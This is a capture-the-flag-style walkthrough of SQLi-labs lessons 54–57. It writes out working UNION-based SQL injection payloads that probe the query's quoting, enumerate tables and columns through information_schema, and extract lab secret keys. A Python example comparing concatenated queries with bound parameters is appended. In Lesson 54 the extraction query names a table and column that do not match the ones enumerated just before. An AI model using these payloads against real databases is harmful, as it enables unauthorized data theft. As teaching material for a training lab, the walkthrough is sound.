(union select challenges)

SQLi-labs: Lesson 54

  1. Try ?id=1
  2. Try ?id=1' or 1=1--+. It works!
  3. Get table name:

    ?id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

    Result: UU9VOJLJIB

  4. Get columns:

    ?id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="UU9VOJLJIB"),3--+

    Result: id,sessid,secret_O3H5,tryy

  5. Get what you want:

    ?id=0' union select 1, (select group_concat(id,0x5c,sessid,0x5c,secret_1V9E,0x5c,tryy) from XKR10CYFA3 limit 0,1),3--+

    Result:

    Your Login name:1\32cd0b3cfed084c5c03f6aafa0bb8d13\0ZM2ob06rYCeeSkCvOUQAEVp\5
    Your Password:3

  6. Submit the secret key: 0ZM2ob06rYCeeSkCvOUQAEVp


SQLi-labs: Lesson 55

  1. Test:
    • ?id=1'--+ does not work
    • ?id=1"--+ does not work
    • ?id=1")--+ does not work
    • ?id=1')--+ does not work
    • ?id=1)--+ This works!
  2. Get table name

    Query: ?id=0) union select 1, (select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

    Result: Your Login name:I7SS1ZXRI8

  3. Get column name

    Query: ?id=0) union select 1, (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="I7SS1ZXRI8"),3--+

    Result: Your Login name:id,sessid,secret_UE6M,tryy

  4. Get what you want now.

    Query: ?id=0) union select 1, (select group_concat(id,0x5c,sessid,0x5c,secret_UE6M,0x5c,tryy) from I7SS1ZXRI8 limit 0,1),3--+

    Result:

    Your Login name:1\eb83113e6503dd70bd02f04ce320abb5\kZf1se0n3QEkbMSSehNAD8sr\8
    Your Password:3

  5. Submit the secret key: kZf1se0n3QEkbMSSehNAD8sr


SQLi-labs: Lesson 56

  1. Test:
    • ?id=1--+ does not work
    • ?id=1')--+ works!
  2. Get table name:

    Query: ?id=0') union select 1, (select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

    Result: Your Login name:FZQFWO9NUQ

  3. Get column name:

    Query: ?id=0') union select 1, (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="FZQFWO9NUQ"),3--+

    Result: Your Login name:id,sessid,secret_ZD48,tryy

  4. Get secret key:

    Query: ?id=0') union select 1, (select group_concat(id,0x5c,sessid,0x5c,secret_ZD48,0x5c,tryy) from FZQFWO9NUQ limit 0,1),3--+

    Result:

    Your Login name:1\ffed1dfb3f479efae11b32df527ce4f8\9H2qqSmOkPFBPunQix897kZ7\7
    Your Password:3

  5. Submit the secret key: 9H2qqSmOkPFBPunQix897kZ7


SQLi-labs: Lesson 57

  1. Test:
    • ?id=-1" union select 1,2,3--+ Works!
  2. Get table name, column name, and the secret key. Queries are similar to previous lessons.

    e.g. ?id=-1" union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+
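
Added example (not part of the original walkthrough or of SQLi-labs' own code): why the quote/parenthesis wrapper that Lessons 54-56 probe for only matters when the id is concatenated into the SQL text, and stops mattering once it is bound as a parameter. The `users` table, the three query templates and the use of SQLite instead of the lab's MySQL are assumptions made for illustration.

```python
import sqlite3

# Constructed stand-ins for the three query shapes the probes above imply.
# The lab's own PHP/MySQL source is not shown on this page.
TEMPLATES = {
    "54": "SELECT * FROM users WHERE id='{}' LIMIT 0,1",
    "55": "SELECT * FROM users WHERE id=({}) LIMIT 0,1",
    "56": "SELECT * FROM users WHERE id=('{}') LIMIT 0,1",
}

# Closing prefix each lesson found to work, followed by the constant UNION
# from Lesson 57's test. "--+" in a URL decodes to "-- ".
PROBES = {
    "54": "0' union select 1,2,3-- ",
    "55": "0) union select 1,2,3-- ",
    "56": "0') union select 1,2,3-- ",
}

def make_db():
    """In-memory table with one constructed row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'Dumb', 'Dumb')")
    return db

def lookup_concat(db, lesson, raw_id):
    """Vulnerable pattern: the id becomes part of the SQL text."""
    return db.execute(TEMPLATES[lesson].format(raw_id)).fetchall()

def lookup_bound(db, raw_id):
    """Hardened pattern: the id is bound as data, so no wrapper can be closed."""
    sql = "SELECT * FROM users WHERE id = ? LIMIT 0,1"
    return db.execute(sql, (raw_id,)).fetchall()

def compare(db):
    """Per lesson: (rows from the concatenated query, rows from the bound query)."""
    return {n: (lookup_concat(db, n, p), lookup_bound(db, p))
            for n, p in PROBES.items()}

if __name__ == "__main__":
    for lesson, (concat_rows, bound_rows) in compare(make_db()).items():
        print(lesson, "concatenated:", concat_rows, "bound:", bound_rows)
```

With concatenation each probe returns the injected row; with the bound parameter the same strings are compared to `id` as plain values and match nothing.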
